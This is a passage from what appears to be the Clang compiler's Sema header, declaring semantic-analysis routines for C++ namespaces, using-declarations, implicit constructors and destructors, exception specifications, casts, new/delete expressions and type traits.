// __builtin_LINE(), __builtin_FUNCTION(), __builtin_FILE(),
// __builtin_COLUMN()
ExprResult ActOnSourceLocExpr(SourceLocExpr::IdentKind Kind,
SourceLocation BuiltinLoc,
SourceLocation RPLoc);
// Build a potentially resolved SourceLocExpr.
ExprResult BuildSourceLocExpr(SourceLocExpr::IdentKind Kind,
SourceLocation BuiltinLoc, SourceLocation RPLoc,
DeclContext *ParentContext);
// __null
ExprResult ActOnGNUNullExpr(SourceLocation TokenLoc);
bool CheckCaseExpression(Expr *E);
/// Describes the result of an "if-exists" condition check.
enum IfExistsResult {
/// The symbol exists.
IER_Exists,
/// The symbol does not exist.
IER_DoesNotExist,
/// The name is a dependent name, so the results will differ
/// from one instantiation to the next.
IER_Dependent,
/// An error occurred.
IER_Error
};
IfExistsResult
CheckMicrosoftIfExistsSymbol(Scope *S, CXXScopeSpec &SS,
const DeclarationNameInfo &TargetNameInfo);
IfExistsResult
CheckMicrosoftIfExistsSymbol(Scope *S, SourceLocation KeywordLoc,
bool IsIfExists, CXXScopeSpec &SS,
UnqualifiedId &Name);
StmtResult BuildMSDependentExistsStmt(SourceLocation KeywordLoc,
bool IsIfExists,
NestedNameSpecifierLoc QualifierLoc,
DeclarationNameInfo NameInfo,
Stmt *Nested);
StmtResult ActOnMSDependentExistsStmt(SourceLocation KeywordLoc,
bool IsIfExists,
CXXScopeSpec &SS, UnqualifiedId &Name,
Stmt *Nested);
//===------------------------- "Block" Extension ------------------------===//
/// ActOnBlockStart - This callback is invoked when a block literal is
/// started.
void ActOnBlockStart(SourceLocation CaretLoc, Scope *CurScope);
/// ActOnBlockArguments - This callback allows processing of block arguments.
/// If there are no arguments, this is still invoked.
void ActOnBlockArguments(SourceLocation CaretLoc, Declarator &ParamInfo,
Scope *CurScope);
/// ActOnBlockError - If there is an error parsing a block, this callback
/// is invoked to pop the information about the block from the action impl.
void ActOnBlockError(SourceLocation CaretLoc, Scope *CurScope);
/// ActOnBlockStmtExpr - This is called when the body of a block statement
/// literal was successfully completed. ^(int x){...}
ExprResult ActOnBlockStmtExpr(SourceLocation CaretLoc, Stmt *Body,
Scope *CurScope);
//===---------------------------- Clang Extensions ----------------------===//
/// __builtin_convertvector(...)
ExprResult ActOnConvertVectorExpr(Expr *E, ParsedType ParsedDestTy,
SourceLocation BuiltinLoc,
SourceLocation RParenLoc);
//===---------------------------- OpenCL Features -----------------------===//
/// __builtin_astype(...)
ExprResult ActOnAsTypeExpr(Expr *E, ParsedType ParsedDestTy,
SourceLocation BuiltinLoc,
SourceLocation RParenLoc);
//===---------------------------- C++ Features --------------------------===//
// Act on C++ namespaces
Decl *ActOnStartNamespaceDef(Scope *S, SourceLocation InlineLoc,
SourceLocation NamespaceLoc,
SourceLocation IdentLoc, IdentifierInfo *Ident,
SourceLocation LBrace,
const ParsedAttributesView &AttrList,
UsingDirectiveDecl *&UsingDecl);
void ActOnFinishNamespaceDef(Decl *Dcl, SourceLocation RBrace);
NamespaceDecl *getStdNamespace() const;
NamespaceDecl *getOrCreateStdNamespace();
NamespaceDecl *lookupStdExperimentalNamespace();
CXXRecordDecl *getStdBadAlloc() const;
EnumDecl *getStdAlignValT() const;
private:
// A cache representing if we've fully checked the various comparison category
// types stored in ASTContext. The bit-index corresponds to the integer value
// of a ComparisonCategoryType enumerator.
llvm::SmallBitVector FullyCheckedComparisonCategories;
ValueDecl *tryLookupCtorInitMemberDecl(CXXRecordDecl *ClassDecl,
CXXScopeSpec &SS,
ParsedType TemplateTypeTy,
IdentifierInfo *MemberOrBase);
public:
enum class ComparisonCategoryUsage {
/// The '<=>' operator was used in an expression and a builtin operator
/// was selected.
OperatorInExpression,
/// A defaulted 'operator<=>' needed the comparison category. This
/// typically only applies to 'std::strong_ordering', due to the implicit
/// fallback return value.
DefaultedOperator,
};
/// Lookup the specified comparison category types in the standard
/// library, an check the VarDecls possibly returned by the operator<=>
/// builtins for that type.
///
/// \return The type of the comparison category type corresponding to the
/// specified Kind, or a null type if an error occurs
QualType CheckComparisonCategoryType(ComparisonCategoryType Kind,
SourceLocation Loc,
ComparisonCategoryUsage Usage);
/// Tests whether Ty is an instance of std::initializer_list and, if
/// it is and Element is not NULL, assigns the element type to Element.
bool isStdInitializerList(QualType Ty, QualType *Element);
/// Looks for the std::initializer_list template and instantiates it
/// with Element, or emits an error if it's not found.
///
/// \returns The instantiated template, or null on error.
QualType BuildStdInitializerList(QualType Element, SourceLocation Loc);
/// Determine whether Ctor is an initializer-list constructor, as
/// defined in [dcl.init.list]p2.
bool isInitListConstructor(const FunctionDecl *Ctor);
Decl *ActOnUsingDirective(Scope *CurScope, SourceLocation UsingLoc,
SourceLocation NamespcLoc, CXXScopeSpec &SS,
SourceLocation IdentLoc,
IdentifierInfo *NamespcName,
const ParsedAttributesView &AttrList);
void PushUsingDirective(Scope *S, UsingDirectiveDecl *UDir);
Decl *ActOnNamespaceAliasDef(Scope *CurScope,
SourceLocation NamespaceLoc,
SourceLocation AliasLoc,
IdentifierInfo *Alias,
CXXScopeSpec &SS,
SourceLocation IdentLoc,
IdentifierInfo *Ident);
void HideUsingShadowDecl(Scope *S, UsingShadowDecl *Shadow);
bool CheckUsingShadowDecl(UsingDecl *UD, NamedDecl *Target,
const LookupResult &PreviousDecls,
UsingShadowDecl *&PrevShadow);
UsingShadowDecl *BuildUsingShadowDecl(Scope *S, UsingDecl *UD,
NamedDecl *Target,
UsingShadowDecl *PrevDecl);
bool CheckUsingDeclRedeclaration(SourceLocation UsingLoc,
bool HasTypenameKeyword,
const CXXScopeSpec &SS,
SourceLocation NameLoc,
const LookupResult &Previous);
bool CheckUsingDeclQualifier(SourceLocation UsingLoc,
bool HasTypename,
const CXXScopeSpec &SS,
const DeclarationNameInfo &NameInfo,
SourceLocation NameLoc);
NamedDecl *BuildUsingDeclaration(
Scope *S, AccessSpecifier AS, SourceLocation UsingLoc,
bool HasTypenameKeyword, SourceLocation TypenameLoc, CXXScopeSpec &SS,
DeclarationNameInfo NameInfo, SourceLocation EllipsisLoc,
const ParsedAttributesView &AttrList, bool IsInstantiation);
NamedDecl *BuildUsingPackDecl(NamedDecl *InstantiatedFrom,
ArrayRef<NamedDecl *> Expansions);
bool CheckInheritingConstructorUsingDecl(UsingDecl *UD);
/// Given a derived-class using shadow declaration for a constructor and the
/// correspnding base class constructor, find or create the implicit
/// synthesized derived class constructor to use for this initialization.
CXXConstructorDecl *
findInheritingConstructor(SourceLocation Loc, CXXConstructorDecl *BaseCtor,
ConstructorUsingShadowDecl *DerivedShadow);
Decl *ActOnUsingDeclaration(Scope *CurScope, AccessSpecifier AS,
SourceLocation UsingLoc,
SourceLocation TypenameLoc, CXXScopeSpec &SS,
UnqualifiedId &Name, SourceLocation EllipsisLoc,
const ParsedAttributesView &AttrList);
Decl *ActOnAliasDeclaration(Scope *CurScope, AccessSpecifier AS,
MultiTemplateParamsArg TemplateParams,
SourceLocation UsingLoc, UnqualifiedId &Name,
const ParsedAttributesView &AttrList,
TypeResult Type, Decl *DeclFromDeclSpec);
/// BuildCXXConstructExpr - Creates a complete call to a constructor,
/// including handling of its default argument expressions.
///
/// \param ConstructKind - a CXXConstructExpr::ConstructionKind
ExprResult
BuildCXXConstructExpr(SourceLocation ConstructLoc, QualType DeclInitType,
NamedDecl *FoundDecl,
CXXConstructorDecl *Constructor, MultiExprArg Exprs,
bool HadMultipleCandidates, bool IsListInitialization,
bool IsStdInitListInitialization,
bool RequiresZeroInit, unsigned ConstructKind,
SourceRange ParenRange);
/// Build a CXXConstructExpr whose constructor has already been resolved if
/// it denotes an inherited constructor.
ExprResult
BuildCXXConstructExpr(SourceLocation ConstructLoc, QualType DeclInitType,
CXXConstructorDecl *Constructor, bool Elidable,
MultiExprArg Exprs,
bool HadMultipleCandidates, bool IsListInitialization,
bool IsStdInitListInitialization,
bool RequiresZeroInit, unsigned ConstructKind,
SourceRange ParenRange);
// FIXME: Can we remove this and have the above BuildCXXConstructExpr check if
// the constructor can be elidable?
ExprResult
BuildCXXConstructExpr(SourceLocation ConstructLoc, QualType DeclInitType,
NamedDecl *FoundDecl,
CXXConstructorDecl *Constructor, bool Elidable,
MultiExprArg Exprs, bool HadMultipleCandidates,
bool IsListInitialization,
bool IsStdInitListInitialization, bool RequiresZeroInit,
unsigned ConstructKind, SourceRange ParenRange);
ExprResult BuildCXXDefaultInitExpr(SourceLocation Loc, FieldDecl *Field);
/// Instantiate or parse a C++ default argument expression as necessary.
/// Return true on error.
bool CheckCXXDefaultArgExpr(SourceLocation CallLoc, FunctionDecl *FD,
ParmVarDecl *Param);
/// BuildCXXDefaultArgExpr - Creates a CXXDefaultArgExpr, instantiating
/// the default expr if needed.
ExprResult BuildCXXDefaultArgExpr(SourceLocation CallLoc,
FunctionDecl *FD,
ParmVarDecl *Param);
/// FinalizeVarWithDestructor - Prepare for calling destructor on the
/// constructed variable.
void FinalizeVarWithDestructor(VarDecl *VD, const RecordType *DeclInitType);
/// Helper class that collects exception specifications for
/// implicitly-declared special member functions.
class ImplicitExceptionSpecification {
// Pointer to allow copying
Sema *Self;
// We order exception specifications thus:
// noexcept is the most restrictive, but is only used in C++11.
// throw() comes next.
// Then a throw(collected exceptions)
// Finally no specification, which is expressed as noexcept(false).
// throw(...) is used instead if any called function uses it.
ExceptionSpecificationType ComputedEST;
llvm::SmallPtrSet<CanQualType, 4> ExceptionsSeen;
SmallVector<QualType, 4> Exceptions;
void ClearExceptions() {
ExceptionsSeen.clear();
Exceptions.clear();
}
public:
explicit ImplicitExceptionSpecification(Sema &Self)
: Self(&Self), ComputedEST(EST_BasicNoexcept) {
if (!Self.getLangOpts().CPlusPlus11)
ComputedEST = EST_DynamicNone;
}
/// Get the computed exception specification type.
ExceptionSpecificationType getExceptionSpecType() const {
assert(!isComputedNoexcept(ComputedEST) &&
"noexcept(expr) should not be a possible result");
return ComputedEST;
}
/// The number of exceptions in the exception specification.
unsigned size() const { return Exceptions.size(); }
/// The set of exceptions in the exception specification.
const QualType *data() const { return Exceptions.data(); }
/// Integrate another called method into the collected data.
void CalledDecl(SourceLocation CallLoc, const CXXMethodDecl *Method);
/// Integrate an invoked expression into the collected data.
void CalledExpr(Expr *E) { CalledStmt(E); }
/// Integrate an invoked statement into the collected data.
void CalledStmt(Stmt *S);
/// Overwrite an EPI's exception specification with this
/// computed exception specification.
FunctionProtoType::ExceptionSpecInfo getExceptionSpec() const {
FunctionProtoType::ExceptionSpecInfo ESI;
ESI.Type = getExceptionSpecType();
if (ESI.Type == EST_Dynamic) {
ESI.Exceptions = Exceptions;
} else if (ESI.Type == EST_None) {
/// C++11 [except.spec]p14:
/// The exception-specification is noexcept(false) if the set of
/// potential exceptions of the special member function contains "any"
ESI.Type = EST_NoexceptFalse;
ESI.NoexceptExpr = Self->ActOnCXXBoolLiteral(SourceLocation(),
tok::kw_false).get();
}
return ESI;
}
};
/// Determine what sort of exception specification a defaulted
/// copy constructor of a class will have.
ImplicitExceptionSpecification
ComputeDefaultedDefaultCtorExceptionSpec(SourceLocation Loc,
CXXMethodDecl *MD);
/// Determine what sort of exception specification a defaulted
/// default constructor of a class will have, and whether the parameter
/// will be const.
ImplicitExceptionSpecification
ComputeDefaultedCopyCtorExceptionSpec(CXXMethodDecl *MD);
/// Determine what sort of exception specification a defaulted
/// copy assignment operator of a class will have, and whether the
/// parameter will be const.
ImplicitExceptionSpecification
ComputeDefaultedCopyAssignmentExceptionSpec(CXXMethodDecl *MD);
/// Determine what sort of exception specification a defaulted move
/// constructor of a class will have.
ImplicitExceptionSpecification
ComputeDefaultedMoveCtorExceptionSpec(CXXMethodDecl *MD);
/// Determine what sort of exception specification a defaulted move
/// assignment operator of a class will have.
ImplicitExceptionSpecification
ComputeDefaultedMoveAssignmentExceptionSpec(CXXMethodDecl *MD);
/// Determine what sort of exception specification a defaulted
/// destructor of a class will have.
ImplicitExceptionSpecification
ComputeDefaultedDtorExceptionSpec(CXXMethodDecl *MD);
/// Determine what sort of exception specification an inheriting
/// constructor of a class will have.
ImplicitExceptionSpecification
ComputeInheritingCtorExceptionSpec(SourceLocation Loc,
CXXConstructorDecl *CD);
/// Evaluate the implicit exception specification for a defaulted
/// special member function.
void EvaluateImplicitExceptionSpec(SourceLocation Loc, FunctionDecl *FD);
/// Check the given noexcept-specifier, convert its expression, and compute
/// the appropriate ExceptionSpecificationType.
ExprResult ActOnNoexceptSpec(SourceLocation NoexceptLoc, Expr *NoexceptExpr,
ExceptionSpecificationType &EST);
/// Check the given exception-specification and update the
/// exception specification information with the results.
void checkExceptionSpecification(bool IsTopLevel,
ExceptionSpecificationType EST,
ArrayRef<ParsedType> DynamicExceptions,
ArrayRef<SourceRange> DynamicExceptionRanges,
Expr *NoexceptExpr,
SmallVectorImpl<QualType> &Exceptions,
FunctionProtoType::ExceptionSpecInfo &ESI);
/// Determine if we're in a case where we need to (incorrectly) eagerly
/// parse an exception specification to work around a libstdc++ bug.
bool isLibstdcxxEagerExceptionSpecHack(const Declarator &D);
/// Add an exception-specification to the given member function
/// (or member function template). The exception-specification was parsed
/// after the method itself was declared.
void actOnDelayedExceptionSpecification(Decl *Method,
ExceptionSpecificationType EST,
SourceRange SpecificationRange,
ArrayRef<ParsedType> DynamicExceptions,
ArrayRef<SourceRange> DynamicExceptionRanges,
Expr *NoexceptExpr);
class InheritedConstructorInfo;
/// Determine if a special member function should have a deleted
/// definition when it is defaulted.
bool ShouldDeleteSpecialMember(CXXMethodDecl *MD, CXXSpecialMember CSM,
InheritedConstructorInfo *ICI = nullptr,
bool Diagnose = false);
/// Produce notes explaining why a defaulted function was defined as deleted.
void DiagnoseDeletedDefaultedFunction(FunctionDecl *FD);
/// Declare the implicit default constructor for the given class.
///
/// \param ClassDecl The class declaration into which the implicit
/// default constructor will be added.
///
/// \returns The implicitly-declared default constructor.
CXXConstructorDecl *DeclareImplicitDefaultConstructor(
CXXRecordDecl *ClassDecl);
/// DefineImplicitDefaultConstructor - Checks for feasibility of
/// defining this constructor as the default constructor.
void DefineImplicitDefaultConstructor(SourceLocation CurrentLocation,
CXXConstructorDecl *Constructor);
/// Declare the implicit destructor for the given class.
///
/// \param ClassDecl The class declaration into which the implicit
/// destructor will be added.
///
/// \returns The implicitly-declared destructor.
CXXDestructorDecl *DeclareImplicitDestructor(CXXRecordDecl *ClassDecl);
/// DefineImplicitDestructor - Checks for feasibility of
/// defining this destructor as the default destructor.
void DefineImplicitDestructor(SourceLocation CurrentLocation,
CXXDestructorDecl *Destructor);
/// Build an exception spec for destructors that don't have one.
///
/// C++11 says that user-defined destructors with no exception spec get one
/// that looks as if the destructor was implicitly declared.
void AdjustDestructorExceptionSpec(CXXDestructorDecl *Destructor);
/// Define the specified inheriting constructor.
void DefineInheritingConstructor(SourceLocation UseLoc,
CXXConstructorDecl *Constructor);
/// Declare the implicit copy constructor for the given class.
///
/// \param ClassDecl The class declaration into which the implicit
/// copy constructor will be added.
///
/// \returns The implicitly-declared copy constructor.
CXXConstructorDecl *DeclareImplicitCopyConstructor(CXXRecordDecl *ClassDecl);
/// DefineImplicitCopyConstructor - Checks for feasibility of
/// defining this constructor as the copy constructor.
void DefineImplicitCopyConstructor(SourceLocation CurrentLocation,
CXXConstructorDecl *Constructor);
/// Declare the implicit move constructor for the given class.
///
/// \param ClassDecl The Class declaration into which the implicit
/// move constructor will be added.
///
/// \returns The implicitly-declared move constructor, or NULL if it wasn't
/// declared.
CXXConstructorDecl *DeclareImplicitMoveConstructor(CXXRecordDecl *ClassDecl);
/// DefineImplicitMoveConstructor - Checks for feasibility of
/// defining this constructor as the move constructor.
void DefineImplicitMoveConstructor(SourceLocation CurrentLocation,
CXXConstructorDecl *Constructor);
/// Declare the implicit copy assignment operator for the given class.
///
/// \param ClassDecl The class declaration into which the implicit
/// copy assignment operator will be added.
///
/// \returns The implicitly-declared copy assignment operator.
CXXMethodDecl *DeclareImplicitCopyAssignment(CXXRecordDecl *ClassDecl);
/// Defines an implicitly-declared copy assignment operator.
void DefineImplicitCopyAssignment(SourceLocation CurrentLocation,
CXXMethodDecl *MethodDecl);
/// Declare the implicit move assignment operator for the given class.
///
/// \param ClassDecl The Class declaration into which the implicit
/// move assignment operator will be added.
///
/// \returns The implicitly-declared move assignment operator, or NULL if it
/// wasn't declared.
CXXMethodDecl *DeclareImplicitMoveAssignment(CXXRecordDecl *ClassDecl);
/// Defines an implicitly-declared move assignment operator.
void DefineImplicitMoveAssignment(SourceLocation CurrentLocation,
CXXMethodDecl *MethodDecl);
/// Force the declaration of any implicitly-declared members of this
/// class.
void ForceDeclarationOfImplicitMembers(CXXRecordDecl *Class);
/// Check a completed declaration of an implicit special member.
void CheckImplicitSpecialMemberDeclaration(Scope *S, FunctionDecl *FD);
/// Determine whether the given function is an implicitly-deleted
/// special member function.
bool isImplicitlyDeleted(FunctionDecl *FD);
/// Check whether 'this' shows up in the type of a static member
/// function after the (naturally empty) cv-qualifier-seq would be.
///
/// \returns true if an error occurred.
bool checkThisInStaticMemberFunctionType(CXXMethodDecl *Method);
/// Whether this' shows up in the exception specification of a static
/// member function.
bool checkThisInStaticMemberFunctionExceptionSpec(CXXMethodDecl *Method);
/// Check whether 'this' shows up in the attributes of the given
/// static member function.
///
/// \returns true if an error occurred.
bool checkThisInStaticMemberFunctionAttributes(CXXMethodDecl *Method);
/// MaybeBindToTemporary - If the passed in expression has a record type with
/// a non-trivial destructor, this will return CXXBindTemporaryExpr. Otherwise
/// it simply returns the passed in expression.
ExprResult MaybeBindToTemporary(Expr *E);
/// Wrap the expression in a ConstantExpr if it is a potential immediate
/// invocation.
ExprResult CheckForImmediateInvocation(ExprResult E, FunctionDecl *Decl);
bool CompleteConstructorCall(CXXConstructorDecl *Constructor,
MultiExprArg ArgsPtr,
SourceLocation Loc,
SmallVectorImpl<Expr*> &ConvertedArgs,
bool AllowExplicit = false,
bool IsListInitialization = false);
ParsedType getInheritingConstructorName(CXXScopeSpec &SS,
SourceLocation NameLoc,
IdentifierInfo &Name);
ParsedType getConstructorName(IdentifierInfo &II, SourceLocation NameLoc,
Scope *S, CXXScopeSpec &SS,
bool EnteringContext);
ParsedType getDestructorName(SourceLocation TildeLoc,
IdentifierInfo &II, SourceLocation NameLoc,
Scope *S, CXXScopeSpec &SS,
ParsedType ObjectType,
bool EnteringContext);
ParsedType getDestructorTypeForDecltype(const DeclSpec &DS,
ParsedType ObjectType);
// Checks that reinterpret casts don't have undefined behavior.
void CheckCompatibleReinterpretCast(QualType SrcType, QualType DestType,
bool IsDereference, SourceRange Range);
/// ActOnCXXNamedCast - Parse {dynamic,static,reinterpret,const}_cast's.
ExprResult ActOnCXXNamedCast(SourceLocation OpLoc,
tok::TokenKind Kind,
SourceLocation LAngleBracketLoc,
Declarator &D,
SourceLocation RAngleBracketLoc,
SourceLocation LParenLoc,
Expr *E,
SourceLocation RParenLoc);
ExprResult BuildCXXNamedCast(SourceLocation OpLoc,
tok::TokenKind Kind,
TypeSourceInfo *Ty,
Expr *E,
SourceRange AngleBrackets,
SourceRange Parens);
ExprResult ActOnBuiltinBitCastExpr(SourceLocation KWLoc, Declarator &Dcl,
ExprResult Operand,
SourceLocation RParenLoc);
ExprResult BuildBuiltinBitCastExpr(SourceLocation KWLoc, TypeSourceInfo *TSI,
Expr *Operand, SourceLocation RParenLoc);
ExprResult BuildCXXTypeId(QualType TypeInfoType,
SourceLocation TypeidLoc,
TypeSourceInfo *Operand,
SourceLocation RParenLoc);
ExprResult BuildCXXTypeId(QualType TypeInfoType,
SourceLocation TypeidLoc,
Expr *Operand,
SourceLocation RParenLoc);
/// ActOnCXXTypeid - Parse typeid( something ).
ExprResult ActOnCXXTypeid(SourceLocation OpLoc,
SourceLocation LParenLoc, bool isType,
void *TyOrExpr,
SourceLocation RParenLoc);
ExprResult BuildCXXUuidof(QualType TypeInfoType,
SourceLocation TypeidLoc,
TypeSourceInfo *Operand,
SourceLocation RParenLoc);
ExprResult BuildCXXUuidof(QualType TypeInfoType,
SourceLocation TypeidLoc,
Expr *Operand,
SourceLocation RParenLoc);
/// ActOnCXXUuidof - Parse __uuidof( something ).
ExprResult ActOnCXXUuidof(SourceLocation OpLoc,
SourceLocation LParenLoc, bool isType,
void *TyOrExpr,
SourceLocation RParenLoc);
/// Handle a C++1z fold-expression: ( expr op ... op expr ).
ExprResult ActOnCXXFoldExpr(SourceLocation LParenLoc, Expr *LHS,
tok::TokenKind Operator,
SourceLocation EllipsisLoc, Expr *RHS,
SourceLocation RParenLoc);
ExprResult BuildCXXFoldExpr(SourceLocation LParenLoc, Expr *LHS,
BinaryOperatorKind Operator,
SourceLocation EllipsisLoc, Expr *RHS,
SourceLocation RParenLoc,
Optional<unsigned> NumExpansions);
ExprResult BuildEmptyCXXFoldExpr(SourceLocation EllipsisLoc,
BinaryOperatorKind Operator);
//// ActOnCXXThis - Parse 'this' pointer.
ExprResult ActOnCXXThis(SourceLocation loc);
/// Build a CXXThisExpr and mark it referenced in the current context.
Expr *BuildCXXThisExpr(SourceLocation Loc, QualType Type, bool IsImplicit);
void MarkThisReferenced(CXXThisExpr *This);
/// Try to retrieve the type of the 'this' pointer.
///
/// \returns The type of 'this', if possible. Otherwise, returns a NULL type.
QualType getCurrentThisType();
/// When non-NULL, the C++ 'this' expression is allowed despite the
/// current context not being a non-static member function. In such cases,
/// this provides the type used for 'this'.
QualType CXXThisTypeOverride;
/// RAII object used to temporarily allow the C++ 'this' expression
/// to be used, with the given qualifiers on the current class type.
class CXXThisScopeRAII {
Sema &S;
QualType OldCXXThisTypeOverride;
bool Enabled;
public:
/// Introduce a new scope where 'this' may be allowed (when enabled),
/// using the given declaration (which is either a class template or a
/// class) along with the given qualifiers.
/// along with the qualifiers placed on '*this'.
CXXThisScopeRAII(Sema &S, Decl *ContextDecl, Qualifiers CXXThisTypeQuals,
bool Enabled = true);
~CXXThisScopeRAII();
};
/// Make sure the value of 'this' is actually available in the current
/// context, if it is a potentially evaluated context.
///
/// \param Loc The location at which the capture of 'this' occurs.
///
/// \param Explicit Whether 'this' is explicitly captured in a lambda
/// capture list.
///
/// \param FunctionScopeIndexToStopAt If non-null, it points to the index
/// of the FunctionScopeInfo stack beyond which we do not attempt to capture.
/// This is useful when enclosing lambdas must speculatively capture
/// 'this' that may or may not be used in certain specializations of
/// a nested generic lambda (depending on whether the name resolves to
/// a non-static member function or a static function).
/// \return returns 'true' if failed, 'false' if success.
bool CheckCXXThisCapture(SourceLocation Loc, bool Explicit = false,
bool BuildAndDiagnose = true,
const unsigned *const FunctionScopeIndexToStopAt = nullptr,
bool ByCopy = false);
/// Determine whether the given type is the type of *this that is used
/// outside of the body of a member function for a type that is currently
/// being defined.
bool isThisOutsideMemberFunctionBody(QualType BaseType);
/// ActOnCXXBoolLiteral - Parse {true,false} literals.
ExprResult ActOnCXXBoolLiteral(SourceLocation OpLoc, tok::TokenKind Kind);
/// ActOnObjCBoolLiteral - Parse {__objc_yes,__objc_no} literals.
ExprResult ActOnObjCBoolLiteral(SourceLocation OpLoc, tok::TokenKind Kind);
ExprResult
ActOnObjCAvailabilityCheckExpr(llvm::ArrayRef<AvailabilitySpec> AvailSpecs,
SourceLocation AtLoc, SourceLocation RParen);
/// ActOnCXXNullPtrLiteral - Parse 'nullptr'.
ExprResult ActOnCXXNullPtrLiteral(SourceLocation Loc);
//// ActOnCXXThrow - Parse throw expressions.
ExprResult ActOnCXXThrow(Scope *S, SourceLocation OpLoc, Expr *expr);
ExprResult BuildCXXThrow(SourceLocation OpLoc, Expr *Ex,
bool IsThrownVarInScope);
bool CheckCXXThrowOperand(SourceLocation ThrowLoc, QualType ThrowTy, Expr *E);
/// ActOnCXXTypeConstructExpr - Parse construction of a specified type.
/// Can be interpreted either as function-style casting ("int(x)")
/// or class type construction ("ClassType(x,y,z)")
/// or creation of a value-initialized type ("int()").
ExprResult ActOnCXXTypeConstructExpr(ParsedType TypeRep,
SourceLocation LParenOrBraceLoc,
MultiExprArg Exprs,
SourceLocation RParenOrBraceLoc,
bool ListInitialization);
ExprResult BuildCXXTypeConstructExpr(TypeSourceInfo *Type,
SourceLocation LParenLoc,
MultiExprArg Exprs,
SourceLocation RParenLoc,
bool ListInitialization);
/// ActOnCXXNew - Parsed a C++ 'new' expression.
ExprResult ActOnCXXNew(SourceLocation StartLoc, bool UseGlobal,
SourceLocation PlacementLParen,
MultiExprArg PlacementArgs,
SourceLocation PlacementRParen,
SourceRange TypeIdParens, Declarator &D,
Expr *Initializer);
ExprResult BuildCXXNew(SourceRange Range, bool UseGlobal,
SourceLocation PlacementLParen,
MultiExprArg PlacementArgs,
SourceLocation PlacementRParen,
SourceRange TypeIdParens,
QualType AllocType,
TypeSourceInfo *AllocTypeInfo,
Optional<Expr *> ArraySize,
SourceRange DirectInitRange,
Expr *Initializer);
/// Determine whether \p FD is an aligned allocation or deallocation
/// function that is unavailable.
bool isUnavailableAlignedAllocationFunction(const FunctionDecl &FD) const;
/// Produce diagnostics if \p FD is an aligned allocation or deallocation
/// function that is unavailable.
void diagnoseUnavailableAlignedAllocation(const FunctionDecl &FD,
SourceLocation Loc);
bool CheckAllocatedType(QualType AllocType, SourceLocation Loc,
SourceRange R);
/// The scope in which to find allocation functions.
enum AllocationFunctionScope {
/// Only look for allocation functions in the global scope.
AFS_Global,
/// Only look for allocation functions in the scope of the
/// allocated class.
AFS_Class,
/// Look for allocation functions in both the global scope
/// and in the scope of the allocated class.
AFS_Both
};
/// Finds the overloads of operator new and delete that are appropriate
/// for the allocation.
bool FindAllocationFunctions(SourceLocation StartLoc, SourceRange Range,
AllocationFunctionScope NewScope,
AllocationFunctionScope DeleteScope,
QualType AllocType, bool IsArray,
bool &PassAlignment, MultiExprArg PlaceArgs,
FunctionDecl *&OperatorNew,
FunctionDecl *&OperatorDelete,
bool Diagnose = true);
void DeclareGlobalNewDelete();
void DeclareGlobalAllocationFunction(DeclarationName Name, QualType Return,
ArrayRef<QualType> Params);
bool FindDeallocationFunction(SourceLocation StartLoc, CXXRecordDecl *RD,
DeclarationName Name, FunctionDecl* &Operator,
bool Diagnose = true);
FunctionDecl *FindUsualDeallocationFunction(SourceLocation StartLoc,
bool CanProvideSize,
bool Overaligned,
DeclarationName Name);
FunctionDecl *FindDeallocationFunctionForDestructor(SourceLocation StartLoc,
CXXRecordDecl *RD);
/// ActOnCXXDelete - Parsed a C++ 'delete' expression
ExprResult ActOnCXXDelete(SourceLocation StartLoc,
bool UseGlobal, bool ArrayForm,
Expr *Operand);
void CheckVirtualDtorCall(CXXDestructorDecl *dtor, SourceLocation Loc,
bool IsDelete, bool CallCanBeVirtual,
bool WarnOnNonAbstractTypes,
SourceLocation DtorLoc);
ExprResult ActOnNoexceptExpr(SourceLocation KeyLoc, SourceLocation LParen,
Expr *Operand, SourceLocation RParen);
ExprResult BuildCXXNoexceptExpr(SourceLocation KeyLoc, Expr *Operand,
SourceLocation RParen);
/// Parsed one of the type trait support pseudo-functions.
ExprResult ActOnTypeTrait(TypeTrait Kind, SourceLocation KWLoc,
ArrayRef<ParsedType> Args,
SourceLocation RParenLoc);
ExprResult BuildTypeTrait(TypeTrait Kind, SourceLocation KWLoc,
ArrayRef<TypeSourceInfo *> Args,
SourceLocation RParenLoc);
/// ActOnArrayTypeTrait - Parsed one of the binary type trait support
/// pseudo-functions.
ExprResult ActOnArrayTypeTrait(ArrayTypeTrait ATT,
SourceLocation KWLoc,
ParsedType LhsTy,
Expr *DimExpr,
SourceLocation RParen);
ExprResult BuildArrayTypeTrait(ArrayTypeTrait ATT,
SourceLocation KWLoc,
TypeSourceInfo *TSInfo,
Expr *DimExpr,
SourceLocation RParen);
/// ActOnExpressionTrait - Parsed one of the unary type trait support
/// pseudo-functions.
ExprResult ActOnExpressionTrait(ExpressionTrait OET,
SourceLocation KWLoc,
Expr *Queried,
SourceLocation RParen);
ExprResult BuildExpressionTrait(ExpressionTrait OET,
SourceLocation KWLoc,
Expr *Queried,
SourceLocation RParen);
ExprResult ActOnStartCXXMemberReference(Scope *S,
Expr *Base,
SourceLocation OpLoc,
tok::TokenKind OpKind,
ParsedType &ObjectType,
bool &MayBePseudoDestructor);
ExprResult BuildPseudoDestructorExpr(Expr *Base,
SourceLocation OpLoc,
tok::TokenKind OpKind,
const CXXScopeSpec &SS,
TypeSourceInfo *ScopeType,
SourceLocation CCLoc,
SourceLocation TildeLoc,
PseudoDestructorTypeStorage DestroyedType);
ExprResult ActOnPseudoDestructorExpr(Scope *S, Expr *Base,
SourceLocation OpLoc,
tok::TokenKind OpKind,
CXXScopeSpec &SS,
UnqualifiedId &FirstTypeName,
SourceLocation CCLoc,
SourceLocation TildeLoc,
UnqualifiedId &SecondTypeName);
ExprResult ActOnPseudoDestructorExpr(Scope *S, Expr *Base,
SourceLocation OpLoc,
tok::TokenKind OpKind,
SourceLocation TildeLoc,
const DeclSpec& DS);
/// MaybeCreateExprWithCleanups - If the current full-expression
/// requires any cleanups, surround it with a ExprWithCleanups node.
/// Otherwise, just returns the passed-in expression.
Expr *MaybeCreateExprWithCleanups(Expr *SubExpr);
Stmt *MaybeCreateStmtWithCleanups(Stmt *SubStmt);
ExprResult MaybeCreateExprWithCleanups(ExprResult SubExpr);
MaterializeTemporaryExpr *
CreateMaterializeTemporaryExpr(QualType T, Expr *Temporary,
bool BoundToLvalueReference);
ExprResult ActOnFinishFullExpr(Expr *Expr, bool DiscardedValue) {
return ActOnFinishFullExpr(
Expr, Expr ? Expr->getExprLoc() : SourceLocation(), DiscardedValue);
}
ExprResult ActOnFinishFullExpr(Expr *Expr, SourceLocation CC,
bool DiscardedValue, bool IsConstexpr = false);
StmtResult ActOnFinishFullStmt(Stmt *Stmt);
// Marks SS invalid if it represents an incomplete type.
